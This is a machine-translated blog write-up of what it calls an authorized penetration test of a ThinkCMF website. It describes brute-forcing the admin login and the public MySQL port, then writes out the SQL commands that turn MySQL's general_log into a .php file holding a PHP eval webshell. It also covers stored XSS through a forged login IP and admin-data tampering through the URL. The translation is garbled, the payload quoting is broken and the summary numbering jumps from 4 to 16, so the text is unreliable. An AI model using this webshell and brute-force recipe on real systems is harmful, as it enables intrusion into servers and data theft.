Title: Record an authorized penetration test

Preface

In an authorized test not long ago, it felt that the purpose of getshell could not be achieved without any step. A single vulnerability is indeed ordinary, but if combined, it may have unexpected chemical effects.

Preliminary test

When I got this site, I saw the member login interface at a glance. At first I thought about registering, but I felt that the membership functions should be very few and there was no verification code. If the backend administrator is also a member, wouldn’t it be possible to go to the backend to try it out?

It shows the mobile phone number login, but you can try admin and don't be confused by his front desk. It's a coincidence that you can enumerate usernames, and there is also an admin account. I'm sorry if I don't explode.

The dictionary uses the Duck King's dictionary, a blasting artifact. This dictionary has been used to blast many sites (https://github.com/TheKingOfDuck/fuzzDicts). This time I was lucky to blast it out.

When you get it to the background and log in, the administrator does like to use the same password and log in. When I saw the suffix that can be customized to upload in the background, I thought I could have a happy exchange. Add the suffix php and find a one-stop getshell to upload.

When I saw the editor for uploading the image, I felt that things were not that simple. As expected, the addition of the suffix did not work

I found that it was the thinkcmf website building system. I searched for vulnerabilities online and saw a collection of vulnerabilities (https://www.hacking8.com/bug-web/ThinkCMS/ThinkCMF%E6%BC%8F%E6%B4%9E%E5%85%A8%E9%9B%86%E5%92%8C.html) I tried one by one but failed. I continued to search (https://www.freebuf.com/vuls/217586.html). Basically, I tried all the payloads. It should be that the vulnerability was fixed in the high version or the utilization method was not correct, but it was not successfully exploited. Some methods are destructive to the website, and I will not be beaten to death if I try it. Since you can't getshell until now, try to find loopholes. If you can't getshell, find more loopholes. You can't listen to your leader.

Advanced Stage

When opening the website at the beginning, the Google plug-in sensor (found on t00ls) can be installed, and the sensitive directories of the website can be initially detected, such as backup files, phpmyadmin, phpinfo, etc. and the existence of phpinfo was detected from the beginning, and the absolute path of the website was obtained.

I used nmap to detect open ports, and found that port 3306 has been opened to the public, and there is an absolute path. I would like to blast 3306 without hope. Anyway, I didn’t burst out a few 3306 passwords. I used the super weak password check tool, and then used the Duck King’s dictionary. Who knows whether the dictionary is powerful or the luck is blasting? By the way, this is not a weak password. I can only say that there is this password in the dictionary. As long as the dictionary exists, it is not wrong.

Next is the regular operation, try logging

show variables like '%general%'; View log status

SET GLOBAL general_log='on' Turn on log reading and writing

SET GLOBAL general_log_file='xxx.php' Specify log path

SELECT '?php eval($_POST['cmd']);' Write log into xxx.php

Other vulnerabilities

Based on a responsible attitude, some other loopholes have been discovered, but they are relatively less harmful, but if you don’t have to write a test report, you can write it.

Login IP forgery This background generally has the habit of recording the user's login IP, but if the IP is selected when recording the IP, the attacker can forge the login IP. If the legitimacy of the IP is not verified, it is not impossible to construct an XSS payload to trigger the storage XSS. I encountered it several times during the test. The storage XSS is located in the background where the member login IP is recorded.

However, the only drawback here is that the background checks the legitimacy of the IP. If it is an illegal IP, it will be reset to 0.0.0.0.0.

After logging in with an overriding vulnerability, I found that the administrator could not operate on himself. This is embarrassing. The administrator could not change his information.

It is a very simple way to find a link that can be changed, change the URL to modify the administrator's information. According to experience, many of the situations where administrators change their own information are front-end restrictions.

Then a details page will pop up, and you can modify it. Here, please change the membership level to change yourself from an ordinary member to a VIP. How can an administrator be an ordinary member? Summary 1. Enter the admin account in the background of the target site administrator. If the password is arbitrary, the password will be displayed, and the admin account exists. 2. Blast the admin account through the intruder function of bp. The password dictionary uses the fuzzDicts dictionary (https://github.com/TheKingOfDuck/fuzzDicts), which can be successfully blasted. 3. After entering the background, the upload of the image has been uploaded, but the target site at the uploading site has been restricted from whitelisting and cannot upload a sentence. 4. Through cloud cricket, the target site was detected by cms fingerprint, and it was found that it was a thinkcm system. It tested several historical vulnerabilities, but it was fruitless. 16. Information detection was carried out through Google Chrome plug-in sensor for detection, and phpinfo.php was found. The absolute path of the website is displayed here. 17. Scan the IP of the target site through namp and find that there is port 3306 18. The target site's port 3306 is blasted through the super weak password tool, and the password was finally successfully blasted. 19. Remotely connect to the target site mysql through navicat, write a sentence through log logging at the SQL command terminal. Show variables like '%general%'; View log status SET GLOBAL general_log='on' Turn on log reading and writing SET GLOBAL general_log_file='xxx.php' Specify log path SELECT '?php eval($_POST['cmd']);' Write the log into xxx.php20. Finally, successfully connect through the ant sword. Source: https://xz.aliyun.com/t/10460